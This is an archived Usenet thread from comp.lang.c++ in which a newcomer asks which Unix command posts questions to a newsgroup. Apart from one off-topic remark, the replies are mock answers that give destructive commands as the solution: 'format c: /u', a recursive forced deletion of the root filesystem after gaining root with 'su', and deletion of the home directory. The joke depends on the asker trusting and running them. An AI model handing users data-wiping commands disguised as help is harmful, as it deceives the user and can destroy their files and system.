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Jonay Aloat
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      03-12-2006
I know that I can use the news group to post questions. But last time, one
of my friend show me that you can do the same thing using a unix command. I
don't remember the command, but I know it is not "trn", or "archie". Can
someone tell me what is the command?

Thanks in advance;

-Keal


 
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Ben Pope
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      03-12-2006
Jonay Aloat wrote:
> I know that I can use the news group to post questions. But last time, one
> of my friend show me that you can do the same thing using a unix command. I
> don't remember the command, but I know it is not "trn", or "archie". Can
> someone tell me what is the command?


not in comp.lang.c++

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Dan C
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      03-12-2006
On Sun, 12 Mar 2006 02:47:31 -0800, Jonay Aloat wrote:

> I know that I can use the news group to post questions. But last time, one
> of my friend show me that you can do the same thing using a unix command. I
> don't remember the command, but I know it is not "trn", or "archie". Can
> someone tell me what is the command?


It's "format c: /u"

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Bob Hairgrove
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      03-12-2006
On Sun, 12 Mar 2006 07:45:17 -0600, Dan C
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>On Sun, 12 Mar 2006 02:47:31 -0800, Jonay Aloat wrote:
>
>> I know that I can use the news group to post questions. But last time, one
>> of my friend show me that you can do the same thing using a unix command. I
>> don't remember the command, but I know it is not "trn", or "archie". Can
>> someone tell me what is the command?

>
>It's "format c: /u"


But he wanted a UNIX command!
Use this instead: "rm -f -R /* "

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Bob Hairgrove
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      03-12-2006
On Sun, 12 Mar 2006 15:26:51 +0100, Bob Hairgrove
<> wrote:

>On Sun, 12 Mar 2006 07:45:17 -0600, Dan C
><> wrote:
>
>>On Sun, 12 Mar 2006 02:47:31 -0800, Jonay Aloat wrote:
>>
>>> I know that I can use the news group to post questions. But last time, one
>>> of my friend show me that you can do the same thing using a unix command. I
>>> don't remember the command, but I know it is not "trn", or "archie". Can
>>> someone tell me what is the command?

>>
>>It's "format c: /u"

>
>But he wanted a UNIX command!
>Use this instead: "rm -f -R /* "


And be sure you have done "su" first!

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Alex Buell
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      03-13-2006
On Sun, 12 Mar 2006 15:28:11 +0100 Bob Hairgrove <>
waved a wand and this message magically appeared:

> >But he wanted a UNIX command!
> >Use this instead: "rm -f -R /* "

>
> And be sure you have done "su" first!


This is even better: "rm -rf $HOME".

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